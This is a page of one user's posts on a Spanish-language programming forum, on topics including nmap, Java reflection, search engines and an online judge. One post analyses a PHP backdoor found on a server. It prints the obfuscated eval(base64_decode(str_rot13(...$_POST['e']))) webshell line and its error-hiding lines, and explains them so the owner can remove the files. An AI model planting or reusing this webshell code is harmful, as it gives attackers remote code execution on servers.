Mensajes

Con la funciona eval() ya puedes imprimir en pantalla, por eso lo encuentraba un poco raro. Puede ser que algunos servidores bloquen eval(), por lo que podría servir como debugging o para algún xss. No te preocupes lo de wordpress, era solo algo que escuche por ahí.

No fue atrapado, lo desmintio
http://www.whoismcafee.com/i-am-safe/

0 tweets, 30000 followers

Que programa estas ocupando? Utiliza nmap y aprende a usarlo correctamente ya que solo con ciertas opciones logras escanear.
Intenta escanear la IP y no el dominio, ya que eso es un poco mas abstracto...

Es un codigo maligno claramente ....
Puedes buscar en internet más casos parecidos al buscar (con las comillas) --> "eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); "
Mira el caso: http://wordpress.org/support/topic/cant-get-rid-of-a-redirecting-trojan
Hace 3 cosas:

Código (php) [Seleccionar] Expandir

@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

1.- La primeras 4 lineas sirven para no mostrar errores, si existe alguno no mostrarlo. También si existe algún error no logearlo, para que asi no te des cuenta tu.

Código (php) [Seleccionar] Expandir

if (isset($_GET['r'])) { print $_GET['r']; }

2.-  Si envia un GET 'r', lo imprime en la web, la verdad no se bien para que le serviria esto a alguien, tal vez como debugging o para xss, ni idea.

Código (php) [Seleccionar] Expandir


eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));

3.- Claramente una especie de shell. eval() lo que hace es evaluar código PHP, y luego siguen un montón de funciones codificadoras, es decir, al enviar un POST  codificado se puede lograr que el servidor haga lo que quiere uno hacer. Por ej: conseguir un shell remoto con exec()

Elimina los archivos inmediatamente ... Y busca como los introdujeron, me parece que fue un ataque automatizado, nose porque....
PD: ¿de casualidad usas wordpress?

Estas seguro que tienes la necesidad de hacer eso? Casi siempre existe otra solución.
Mira este codigo que creo que tiene lo que necesitas: http://docs.oracle.com/javase/tutorial/reflect/member/methodInvocation.html

Código (java) [Seleccionar] Expandir


   Class<?> c = Class.forName(args[0]);
   Object t = c.newInstance();


Tambien sale como llamar a los métodos y otras cosas. Con try/catch podrias verificar si existe o no la clase.

Saludos!

Me anoto en ayudar porque me gusta la iniciativa, no me interesa la plata. Soy pésimo diseñador. Ayudo en lo que sea porque creo que últimamente muchos foros de informática van en decadencia.

No entiendo como gente se cree estas cosas.

Aunque yo hace 1 año y medio que lo tengo en Android y todavía no he pagado nada y sigue funcionando.

Muy cierto, al año me dio otro año sin hacer nada.

Comprendo.
Hace mucho tiempo había una iniciativa en este foro para hacer un juez como el que dices (Aqui), nose en que termino. Para enlazar lo que puedes hacer uso es de los métodos exec() y shell_exec() para ejecutar comandos en el sistema y llamar a los compiladores para después ejecutar el programa y verificar el output. Tienes que tener mucho cuidado con filtrar bien o sino fácilmente podría tener acceso al sistema.

bing no sirve para nada
falta mucho para quitarle el puesto a google, hasta decian que wolfram alpha se lo iba a quitar